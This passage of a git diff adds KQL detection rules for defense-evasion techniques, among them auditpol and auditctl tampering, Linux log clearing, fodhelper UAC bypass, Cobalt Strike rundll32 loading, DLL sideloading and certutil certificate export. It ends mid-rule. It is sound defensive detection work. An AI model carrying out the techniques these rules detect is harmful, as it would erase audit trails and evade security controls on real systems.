/dev/null +++ b/KQL/rules/Defense Evasion/arbitrary_file_download_via_squirrel_exe.kql @@ -0,0 +1,13 @@ +// Title: Arbitrary File Download Via Squirrel.EXE +// Author: Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community +// Date: 2022-06-09 +// Level: medium +// Description: Detects the usage of the "Squirrel.exe" to download arbitrary files. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.) + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1218 +// False Positives: +// - Expected FP with some Electron based applications such as (1Clipboard, Beaker Browser, Caret, Discord, GitHub Desktop, etc.) + +DeviceProcessEvents +| where (ProcessCommandLine contains " --download " or ProcessCommandLine contains " --update " or ProcessCommandLine contains " --updateRollback=") and ProcessCommandLine contains "http" and (FolderPath endswith "\\squirrel.exe" or FolderPath endswith "\\update.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/aruba_network_service_potential_dll_sideloading.kql b/KQL/rules/Defense Evasion/aruba_network_service_potential_dll_sideloading.kql new file mode 100644 index 00000000..0674ea72 --- /dev/null +++ b/KQL/rules/Defense Evasion/aruba_network_service_potential_dll_sideloading.kql @@ -0,0 +1,10 @@ +// Title: Aruba Network Service Potential DLL Sideloading +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-22 +// Level: high +// Description: Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access "arubanetsvc.exe" process using DLL Search Order Hijacking +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.persistence, attack.t1574.001 + +DeviceImageLoadEvents +| where ((FolderPath endswith "\\wtsapi32.dll" or FolderPath endswith "\\msvcr100.dll" or FolderPath endswith "\\msvcp100.dll" or FolderPath endswith "\\dbghelp.dll" or FolderPath endswith "\\dbgcore.dll" or FolderPath endswith "\\wininet.dll" or FolderPath endswith "\\iphlpapi.dll" or FolderPath endswith "\\version.dll" or FolderPath endswith "\\cryptsp.dll" or FolderPath endswith "\\cryptbase.dll" or FolderPath endswith "\\wldp.dll" or FolderPath endswith "\\profapi.dll" or FolderPath endswith "\\sspicli.dll" or FolderPath endswith "\\winsta.dll" or FolderPath endswith "\\dpapi.dll") and InitiatingProcessFolderPath endswith "\\arubanetsvc.exe") and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/aspnetcompiler_execution.kql b/KQL/rules/Defense Evasion/aspnetcompiler_execution.kql new file mode 100644 index 00000000..65278ddd --- /dev/null +++ b/KQL/rules/Defense Evasion/aspnetcompiler_execution.kql @@ -0,0 +1,10 @@ +// Title: AspNetCompiler Execution +// Author: frack113 +// Date: 2021-11-24 +// Level: medium +// Description: Detects execution of "aspnet_compiler.exe" which can be abused to compile and execute C# code. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1127 + +DeviceProcessEvents +| where (FolderPath contains ":\\Windows\\Microsoft.NET\\Framework\\" or FolderPath contains ":\\Windows\\Microsoft.NET\\Framework64\\" or FolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm\\" or FolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm64\\") and FolderPath endswith "\\aspnet_compiler.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/assembly_loading_via_cl_loadassembly_ps1.kql b/KQL/rules/Defense Evasion/assembly_loading_via_cl_loadassembly_ps1.kql new file mode 100644 index 00000000..52d6cf47 --- /dev/null +++ b/KQL/rules/Defense Evasion/assembly_loading_via_cl_loadassembly_ps1.kql @@ -0,0 +1,10 @@ +// Title: Assembly Loading Via CL_LoadAssembly.ps1 +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-05-21 +// Level: medium +// Description: Detects calls to "LoadAssemblyFromPath" or "LoadAssemblyFromNS" that are part of the "CL_LoadAssembly.ps1" script. This can be abused to load different assemblies and bypass App locker controls. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1216 + +DeviceProcessEvents +| where ProcessCommandLine contains "LoadAssemblyFromPath " or ProcessCommandLine contains "LoadAssemblyFromNS " \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/audit_policy_tampering_via_auditpol.kql b/KQL/rules/Defense Evasion/audit_policy_tampering_via_auditpol.kql new file mode 100644 index 00000000..7ffb880d --- /dev/null +++ b/KQL/rules/Defense Evasion/audit_policy_tampering_via_auditpol.kql @@ -0,0 +1,14 @@ +// Title: Audit Policy Tampering Via Auditpol +// Author: Janantha Marasinghe (https://github.com/blueteam0ps) +// Date: 2021-02-02 +// Level: high +// Description: Threat actors can use auditpol binary to change audit policy configuration to impair detection capability. +This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.002 +// False Positives: +// - Administrator or administrator scripts might leverage the flags mentioned in the detection section. Either way, it should always be monitored + +DeviceProcessEvents +| where (ProcessCommandLine contains "disable" or ProcessCommandLine contains "clear" or ProcessCommandLine contains "remove" or ProcessCommandLine contains "restore") and (FolderPath endswith "\\auditpol.exe" or ProcessVersionInfoOriginalFileName =~ "AUDITPOL.EXE") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/audit_policy_tampering_via_nt_resource_kit_auditpol.kql b/KQL/rules/Defense Evasion/audit_policy_tampering_via_nt_resource_kit_auditpol.kql new file mode 100644 index 00000000..12fe1441 --- /dev/null +++ b/KQL/rules/Defense Evasion/audit_policy_tampering_via_nt_resource_kit_auditpol.kql @@ -0,0 +1,14 @@ +// Title: Audit Policy Tampering Via NT Resource Kit Auditpol +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2021-12-18 +// Level: high +// Description: Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability. +This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.002 +// False Positives: +// - The old auditpol utility isn't available by default on recent versions of Windows as it was replaced by a newer version. The FP rate should be very low except for tools that use a similar flag structure + +DeviceProcessEvents +| where ProcessCommandLine contains "/logon:none" or ProcessCommandLine contains "/system:none" or ProcessCommandLine contains "/sam:none" or ProcessCommandLine contains "/privilege:none" or ProcessCommandLine contains "/object:none" or ProcessCommandLine contains "/process:none" or ProcessCommandLine contains "/policy:none" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/audit_rules_deleted_via_auditctl.kql b/KQL/rules/Defense Evasion/audit_rules_deleted_via_auditctl.kql new file mode 100644 index 00000000..954d84b1 --- /dev/null +++ b/KQL/rules/Defense Evasion/audit_rules_deleted_via_auditctl.kql @@ -0,0 +1,15 @@ +// Title: Audit Rules Deleted Via Auditctl +// Author: Mohamed LAKRI +// Date: 2025-10-17 +// Level: high +// Description: Detects the execution of 'auditctl' with the '-D' command line parameter, which deletes all configured audit rules and watches on Linux systems. +This technique is commonly used by attackers to disable audit logging and cover their tracks by removing monitoring capabilities. +Removal of audit rules can significantly impair detection of malicious activities on the affected system. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.012 +// False Positives: +// - An administrator troubleshooting. Investigate all attempts. + +DeviceProcessEvents +| where ProcessCommandLine matches regex "-D" and FolderPath endswith "/auditctl" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/awl_bypass_with_winrm_vbs_and_malicious_wsmpty_xsl_wsmtxt_xsl.kql b/KQL/rules/Defense Evasion/awl_bypass_with_winrm_vbs_and_malicious_wsmpty_xsl_wsmtxt_xsl.kql new file mode 100644 index 00000000..08ca00c1 --- /dev/null +++ b/KQL/rules/Defense Evasion/awl_bypass_with_winrm_vbs_and_malicious_wsmpty_xsl_wsmtxt_xsl.kql @@ -0,0 +1,12 @@ +// Title: AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl +// Author: Julia Fomina, oscd.community +// Date: 2020-10-06 +// Level: medium +// Description: Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1216 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ProcessCommandLine contains "winrm" and ((ProcessCommandLine contains "format:pretty" or ProcessCommandLine contains "format:\"pretty\"" or ProcessCommandLine contains "format:\"text\"" or ProcessCommandLine contains "format:text") and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/awl_bypass_with_winrm_vbs_and_malicious_wsmpty_xsl_wsmtxt_xsl_file.kql b/KQL/rules/Defense Evasion/awl_bypass_with_winrm_vbs_and_malicious_wsmpty_xsl_wsmtxt_xsl_file.kql new file mode 100644 index 00000000..9c6576c2 --- /dev/null +++ b/KQL/rules/Defense Evasion/awl_bypass_with_winrm_vbs_and_malicious_wsmpty_xsl_wsmtxt_xsl_file.kql @@ -0,0 +1,12 @@ +// Title: AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File +// Author: Julia Fomina, oscd.community +// Date: 2020-10-06 +// Level: medium +// Description: Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1216 +// False Positives: +// - Unlikely + +DeviceFileEvents +| where (FolderPath endswith "WsmPty.xsl" or FolderPath endswith "WsmTxt.xsl") and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/baaupdate_exe_suspicious_dll_load.kql b/KQL/rules/Defense Evasion/baaupdate_exe_suspicious_dll_load.kql new file mode 100644 index 00000000..da220433 --- /dev/null +++ b/KQL/rules/Defense Evasion/baaupdate_exe_suspicious_dll_load.kql @@ -0,0 +1,13 @@ +// Title: BaaUpdate.exe Suspicious DLL Load +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-10-18 +// Level: high +// Description: Detects BitLocker Access Agent Update Utility (baaupdate.exe) loading DLLs from suspicious locations that are publicly writable which could indicate an attempt to lateral movement via BitLocker DCOM & COM Hijacking. +This technique abuses COM Classes configured as INTERACTIVE USER to spawn processes in the context of the logged-on user's session. Specifically, it targets the BDEUILauncher Class (CLSID ab93b6f1-be76-4185-a488-a9001b105b94) +which can launch BaaUpdate.exe, which is vulnerable to COM Hijacking when started with input parameters. This allows attackers to execute code in the user's context without needing to steal credentials or use additional techniques to compromise the account. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218, attack.lateral-movement, attack.t1021.003 + +DeviceImageLoadEvents +| where (FolderPath contains ":\\Perflogs\\" or FolderPath contains ":\\Users\\Default\\" or FolderPath contains ":\\Users\\Public\\" or FolderPath contains ":\\Windows\\Temp\\" or FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\AppData\\Roaming\\" or FolderPath contains "\\Contacts\\" or FolderPath contains "\\Favorites\\" or FolderPath contains "\\Favourites\\" or FolderPath contains "\\Links\\" or FolderPath contains "\\Music\\" or FolderPath contains "\\Pictures\\" or FolderPath contains "\\ProgramData\\" or FolderPath contains "\\Temporary Internet" or FolderPath contains "\\Videos\\") and FolderPath endswith ".dll" and InitiatingProcessFolderPath endswith "\\BaaUpdate.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/bad_opsec_defaults_sacrificial_processes_with_improper_arguments.kql b/KQL/rules/Defense Evasion/bad_opsec_defaults_sacrificial_processes_with_improper_arguments.kql new file mode 100644 index 00000000..69290c62 --- /dev/null +++ b/KQL/rules/Defense Evasion/bad_opsec_defaults_sacrificial_processes_with_improper_arguments.kql @@ -0,0 +1,15 @@ +// Title: Bad Opsec Defaults Sacrificial Processes With Improper Arguments +// Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems) +// Date: 2020-10-23 +// Level: high +// Description: Detects attackers using tooling with bad opsec defaults. +E.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run. +One trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.011 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ((ProcessCommandLine endswith "regasm.exe" and FolderPath endswith "\\regasm.exe") or (ProcessCommandLine endswith "regsvcs.exe" and FolderPath endswith "\\regsvcs.exe") or (ProcessCommandLine endswith "regsvr32.exe" and FolderPath endswith "\\regsvr32.exe") or (ProcessCommandLine endswith "rundll32.exe" and FolderPath endswith "\\rundll32.exe") or (ProcessCommandLine endswith "WerFault.exe" and FolderPath endswith "\\WerFault.exe")) and (not(((ProcessCommandLine endswith "rundll32.exe" and FolderPath endswith "\\rundll32.exe" and InitiatingProcessCommandLine contains "--uninstall " and (InitiatingProcessFolderPath contains "\\AppData\\Local\\BraveSoftware\\Brave-Browser\\Application\\" or InitiatingProcessFolderPath contains "\\AppData\\Local\\Google\\Chrome\\Application\\") and InitiatingProcessFolderPath endswith "\\Installer\\setup.exe") or (ProcessCommandLine endswith "rundll32.exe" and FolderPath endswith "\\rundll32.exe" and InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\EdgeUpdate\\Install\\{")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/base64_encoded_powershell_command_detected.kql b/KQL/rules/Defense Evasion/base64_encoded_powershell_command_detected.kql new file mode 100644 index 00000000..e49aff2f --- /dev/null +++ b/KQL/rules/Defense Evasion/base64_encoded_powershell_command_detected.kql @@ -0,0 +1,12 @@ +// Title: Base64 Encoded PowerShell Command Detected +// Author: Florian Roth (Nextron Systems) +// Date: 2020-01-29 +// Level: high +// Description: Detects usage of the "FromBase64String" function in the commandline which is used to decode a base64 encoded string +// MITRE Tactic: Defense Evasion +// Tags: attack.t1027, attack.defense-evasion, attack.execution, attack.t1140, attack.t1059.001 +// False Positives: +// - Administrative script libraries + +DeviceProcessEvents +| where ProcessCommandLine contains "::FromBase64String(" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/binary_padding_macos.kql b/KQL/rules/Defense Evasion/binary_padding_macos.kql new file mode 100644 index 00000000..f60896e4 --- /dev/null +++ b/KQL/rules/Defense Evasion/binary_padding_macos.kql @@ -0,0 +1,12 @@ +// Title: Binary Padding - MacOS +// Author: Igor Fits, Mikhail Larin, oscd.community +// Date: 2020-10-19 +// Level: high +// Description: Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This rule detect using dd and truncate to add a junk data to file. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027.001 +// False Positives: +// - Legitimate script work + +DeviceProcessEvents +| where ((ProcessCommandLine contains "if=/dev/zero" or ProcessCommandLine contains "if=/dev/random" or ProcessCommandLine contains "if=/dev/urandom") and FolderPath endswith "/dd") or (ProcessCommandLine contains "-s +" and FolderPath endswith "/truncate") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/bitlockertogo_exe_execution.kql b/KQL/rules/Defense Evasion/bitlockertogo_exe_execution.kql new file mode 100644 index 00000000..69577313 --- /dev/null +++ b/KQL/rules/Defense Evasion/bitlockertogo_exe_execution.kql @@ -0,0 +1,16 @@ +// Title: BitLockerTogo.EXE Execution +// Author: Josh Nickels, mttaggart +// Date: 2024-07-11 +// Level: low +// Description: Detects the execution of "BitLockerToGo.EXE". +BitLocker To Go is BitLocker Drive Encryption on removable data drives. This feature includes the encryption of, USB flash drives, SD cards, External hard disk drives, Other drives that are formatted by using the NTFS, FAT16, FAT32, or exFAT file system. +This is a rarely used application and usage of it at all is worth investigating. +Malware such as Lumma stealer has been seen using this process as a target for process hollowing. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - Legitimate usage of BitLockerToGo.exe to encrypt portable devices. + +DeviceProcessEvents +| where FolderPath endswith "\\BitLockerToGo.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/browser_execution_in_headless_mode.kql b/KQL/rules/Defense Evasion/browser_execution_in_headless_mode.kql new file mode 100644 index 00000000..bafc18f9 --- /dev/null +++ b/KQL/rules/Defense Evasion/browser_execution_in_headless_mode.kql @@ -0,0 +1,10 @@ +// Title: Browser Execution In Headless Mode +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-09-12 +// Level: low +// Description: Detects execution of Chromium based browser in headless mode +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.command-and-control, attack.t1105, attack.t1564.003 + +DeviceProcessEvents +| where ProcessCommandLine contains "--headless" and (FolderPath endswith "\\brave.exe" or FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\opera.exe" or FolderPath endswith "\\vivaldi.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/bypass_uac_via_fodhelper_exe.kql b/KQL/rules/Defense Evasion/bypass_uac_via_fodhelper_exe.kql new file mode 100644 index 00000000..5636a175 --- /dev/null +++ b/KQL/rules/Defense Evasion/bypass_uac_via_fodhelper_exe.kql @@ -0,0 +1,12 @@ +// Title: Bypass UAC via Fodhelper.exe +// Author: E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community +// Date: 2019-10-24 +// Level: high +// Description: Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 +// False Positives: +// - Legitimate use of fodhelper.exe utility by legitimate user + +DeviceProcessEvents +| where InitiatingProcessFolderPath endswith "\\fodhelper.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/c_il_code_compilation_via_ilasm_exe.kql b/KQL/rules/Defense Evasion/c_il_code_compilation_via_ilasm_exe.kql new file mode 100644 index 00000000..faa662bb --- /dev/null +++ b/KQL/rules/Defense Evasion/c_il_code_compilation_via_ilasm_exe.kql @@ -0,0 +1,10 @@ +// Title: C# IL Code Compilation Via Ilasm.EXE +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-05-07 +// Level: medium +// Description: Detects the use of "Ilasm.EXE" in order to compile C# intermediate (IL) code to EXE or DLL. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1127 + +DeviceProcessEvents +| where (ProcessCommandLine contains " /dll" or ProcessCommandLine contains " /exe") and (FolderPath endswith "\\ilasm.exe" or ProcessVersionInfoOriginalFileName =~ "ilasm.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/certificate_exported_via_certutil_exe.kql b/KQL/rules/Defense Evasion/certificate_exported_via_certutil_exe.kql new file mode 100644 index 00000000..2ad75a9a --- /dev/null +++ b/KQL/rules/Defense Evasion/certificate_exported_via_certutil_exe.kql @@ -0,0 +1,12 @@ +// Title: Certificate Exported Via Certutil.EXE +// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-02-15 +// Level: medium +// Description: Detects the execution of the certutil with the "exportPFX" flag which allows the utility to export certificates. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027 +// False Positives: +// - There legitimate reasons to export certificates. Investigate the activity to determine if it's benign + +DeviceProcessEvents +| where (ProcessCommandLine contains "-exportPFX " or ProcessCommandLine contains "/exportPFX " or ProcessCommandLine contains "–exportPFX " or ProcessCommandLine contains "—exportPFX " or ProcessCommandLine contains "―exportPFX ") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/change_winevt_channel_access_permission_via_registry.kql b/KQL/rules/Defense Evasion/change_winevt_channel_access_permission_via_registry.kql new file mode 100644 index 00000000..f4122fad --- /dev/null +++ b/KQL/rules/Defense Evasion/change_winevt_channel_access_permission_via_registry.kql @@ -0,0 +1,10 @@ +// Title: Change Winevt Channel Access Permission Via Registry +// Author: frack113 +// Date: 2022-09-17 +// Level: high +// Description: Detects tampering with the "ChannelAccess" registry key in order to change access to Windows event channel. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.002 + +DeviceRegistryEvents +| where ((RegistryValueData contains "(A;;0x1;;;LA)" or RegistryValueData contains "(A;;0x1;;;SY)" or RegistryValueData contains "(A;;0x5;;;BA)") and RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels*" and RegistryKey endswith "\\ChannelAccess") and (not(((InitiatingProcessFolderPath endswith "\\TiWorker.exe" and InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\") or InitiatingProcessFolderPath =~ "C:\\Windows\\servicing\\TrustedInstaller.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/chmod_suspicious_directory.kql b/KQL/rules/Defense Evasion/chmod_suspicious_directory.kql new file mode 100644 index 00000000..7662daa6 --- /dev/null +++ b/KQL/rules/Defense Evasion/chmod_suspicious_directory.kql @@ -0,0 +1,12 @@ +// Title: Chmod Suspicious Directory +// Author: Christopher Peacock @SecurePeacock, SCYTHE @scythe_io +// Date: 2022-06-03 +// Level: medium +// Description: Detects chmod targeting files in abnormal directory paths. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1222.002 +// False Positives: +// - Admin changing file permissions. + +DeviceProcessEvents +| where (ProcessCommandLine contains "/tmp/" or ProcessCommandLine contains "/.Library/" or ProcessCommandLine contains "/etc/" or ProcessCommandLine contains "/opt/") and FolderPath endswith "/chmod" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/clear_linux_logs.kql b/KQL/rules/Defense Evasion/clear_linux_logs.kql new file mode 100644 index 00000000..6097fa76 --- /dev/null +++ b/KQL/rules/Defense Evasion/clear_linux_logs.kql @@ -0,0 +1,12 @@ +// Title: Clear Linux Logs +// Author: Ömer Günal, oscd.community +// Date: 2020-10-07 +// Level: medium +// Description: Detects attempts to clear logs on the system. Adversaries may clear system logs to hide evidence of an intrusion +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070.002 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents +| where (ProcessCommandLine contains "/var/log" or ProcessCommandLine contains "/var/spool/mail") and (FolderPath endswith "/rm" or FolderPath endswith "/shred" or FolderPath endswith "/unlink") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/cmstp_execution_process_creation.kql b/KQL/rules/Defense Evasion/cmstp_execution_process_creation.kql new file mode 100644 index 00000000..f5cd1660 --- /dev/null +++ b/KQL/rules/Defense Evasion/cmstp_execution_process_creation.kql @@ -0,0 +1,12 @@ +// Title: CMSTP Execution Process Creation +// Author: Nik Seetharaman +// Date: 2018-07-16 +// Level: high +// Description: Detects various indicators of Microsoft Connection Manager Profile Installer execution +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1218.003, attack.g0069, car.2019-04-001 +// False Positives: +// - Legitimate CMSTP use (unlikely in modern enterprise environments) + +DeviceProcessEvents +| where InitiatingProcessFolderPath endswith "\\cmstp.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/cmstp_execution_registry_event.kql b/KQL/rules/Defense Evasion/cmstp_execution_registry_event.kql new file mode 100644 index 00000000..08f66879 --- /dev/null +++ b/KQL/rules/Defense Evasion/cmstp_execution_registry_event.kql @@ -0,0 +1,12 @@ +// Title: CMSTP Execution Registry Event +// Author: Nik Seetharaman +// Date: 2018-07-16 +// Level: high +// Description: Detects various indicators of Microsoft Connection Manager Profile Installer execution +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1218.003, attack.g0069, car.2019-04-001 +// False Positives: +// - Legitimate CMSTP use (unlikely in modern enterprise environments) + +DeviceRegistryEvents +| where RegistryKey contains "\\cmmgr32.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/cobaltstrike_load_by_rundll32.kql b/KQL/rules/Defense Evasion/cobaltstrike_load_by_rundll32.kql new file mode 100644 index 00000000..262dc233 --- /dev/null +++ b/KQL/rules/Defense Evasion/cobaltstrike_load_by_rundll32.kql @@ -0,0 +1,10 @@ +// Title: CobaltStrike Load by Rundll32 +// Author: Wojciech Lesicki +// Date: 2021-06-01 +// Level: high +// Description: Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.011 + +DeviceProcessEvents +| where (ProcessCommandLine contains ".dll" and (ProcessCommandLine endswith " StartW" or ProcessCommandLine endswith ",StartW")) and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE" or (ProcessCommandLine contains "rundll32.exe" or ProcessCommandLine contains "rundll32 ")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/code_execution_via_pcwutl_dll.kql b/KQL/rules/Defense Evasion/code_execution_via_pcwutl_dll.kql new file mode 100644 index 00000000..e6facada --- /dev/null +++ b/KQL/rules/Defense Evasion/code_execution_via_pcwutl_dll.kql @@ -0,0 +1,12 @@ +// Title: Code Execution via Pcwutl.dll +// Author: Julia Fomina, oscd.community +// Date: 2020-10-05 +// Level: medium +// Description: Detects launch of executable by calling the LaunchApplication function from pcwutl.dll library. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.011 +// False Positives: +// - Use of Program Compatibility Troubleshooter Helper + +DeviceProcessEvents +| where (ProcessCommandLine contains "pcwutl" and ProcessCommandLine contains "LaunchApplication") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/codepage_modification_via_mode_com_to_russian_language.kql b/KQL/rules/Defense Evasion/codepage_modification_via_mode_com_to_russian_language.kql new file mode 100644 index 00000000..33ceb73a --- /dev/null +++ b/KQL/rules/Defense Evasion/codepage_modification_via_mode_com_to_russian_language.kql @@ -0,0 +1,14 @@ +// Title: CodePage Modification Via MODE.COM To Russian Language +// Author: Joseliyo Sanchez, @Joseliyo_Jstnk +// Date: 2024-01-17 +// Level: medium +// Description: Detects a CodePage modification using the "mode.com" utility to Russian language. +This behavior has been used by threat actors behind Dharma ransomware. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036 +// False Positives: +// - Russian speaking people changing the CodePage + +DeviceProcessEvents +| where ((ProcessCommandLine contains " con " and ProcessCommandLine contains " cp " and ProcessCommandLine contains " select=") and (ProcessCommandLine endswith "=1251" or ProcessCommandLine endswith "=866")) and (FolderPath endswith "\\mode.com" or ProcessVersionInfoOriginalFileName =~ "MODE.COM") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/com_object_execution_via_xwizard_exe.kql b/KQL/rules/Defense Evasion/com_object_execution_via_xwizard_exe.kql new file mode 100644 index 00000000..6e3610c5 --- /dev/null +++ b/KQL/rules/Defense Evasion/com_object_execution_via_xwizard_exe.kql @@ -0,0 +1,12 @@ +// Title: COM Object Execution via Xwizard.EXE +// Author: Ensar Şamil, @sblmsrsn, @oscd_initiative, Nasreddine Bencherchali (Nextron Systems) +// Date: 2020-10-07 +// Level: medium +// Description: Detects the execution of Xwizard tool with the "RunWizard" flag and a GUID like argument. +This utility can be abused in order to run custom COM object created in the registry. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceProcessEvents +| where ProcessCommandLine =~ "RunWizard" and ProcessCommandLine matches regex "\\{[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}\\}" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/connection_proxy.kql b/KQL/rules/Defense Evasion/connection_proxy.kql new file mode 100644 index 00000000..9ab632c3 --- /dev/null +++ b/KQL/rules/Defense Evasion/connection_proxy.kql @@ -0,0 +1,12 @@ +// Title: Connection Proxy +// Author: Ömer Günal +// Date: 2020-06-17 +// Level: low +// Description: Detects setting proxy configuration +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.command-and-control, attack.t1090 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents +| where ProcessCommandLine contains "http_proxy=" or ProcessCommandLine contains "https_proxy=" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/convertto_securestring_cmdlet_usage_via_commandline.kql b/KQL/rules/Defense Evasion/convertto_securestring_cmdlet_usage_via_commandline.kql new file mode 100644 index 00000000..297196f1 --- /dev/null +++ b/KQL/rules/Defense Evasion/convertto_securestring_cmdlet_usage_via_commandline.kql @@ -0,0 +1,12 @@ +// Title: ConvertTo-SecureString Cmdlet Usage Via CommandLine +// Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton +// Date: 2020-10-11 +// Level: medium +// Description: Detects usage of the "ConvertTo-SecureString" cmdlet via the commandline. Which is fairly uncommon and could indicate potential suspicious activity +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001 +// False Positives: +// - Legitimate use to pass password to different powershell commands + +DeviceProcessEvents +| where ProcessCommandLine contains 